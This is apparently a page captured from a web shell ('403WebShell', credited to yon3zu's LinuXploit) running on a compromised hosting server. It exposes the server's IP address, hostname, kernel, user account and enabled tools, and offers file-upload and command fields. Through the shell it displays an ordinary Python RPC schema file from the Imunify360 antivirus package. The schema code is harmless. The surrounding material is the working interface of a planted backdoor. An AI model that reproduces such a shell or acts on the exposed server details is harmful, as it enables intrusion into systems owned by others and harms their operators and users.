Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.35.234
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/simple_rpc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/imunify360/venv/lib/python3.11/site-packages/imav/simple_rpc/schema.py
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
from imav.rpc_tools.middleware import add_malicious_count
from defence360agent.contracts.config import UserType
from defence360agent.rpc_tools.middleware import max_count
from defence360agent.simple_rpc.schema import (
    init_validator as init_base_validator,
)


def init_validator(schema_validator, validate_middleware, schema_paths):
    imav_middleware = {
        ("malware", "ignore", "list"): [
            # need for backward compatibility
            # convert result -> tuple (max_items, items) ->
            # dict {max_items:<int>, items:[...]}
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("malware", "malicious", "list"): [
            (add_malicious_count, (UserType.ROOT, UserType.NON_ROOT)),
            (max_count, (UserType.ROOT, UserType.NON_ROOT)),
        ],
        ("malware", "history", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("malware", "user", "list"): [
            (add_malicious_count, (UserType.ROOT, UserType.NON_ROOT)),
            (max_count, (UserType.ROOT, UserType.NON_ROOT)),
        ],
        ("malware", "suspicious", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("malware", "on-demand", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("malware", "on-demand", "list-user"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
    }
    validator, middleware, middleware_exclude = init_base_validator(
        schema_validator, validate_middleware, schema_paths
    )
    middleware.update(imav_middleware)
    return validator, middleware, middleware_exclude

Youez - 2016 - github.com/yon3zu
LinuXploit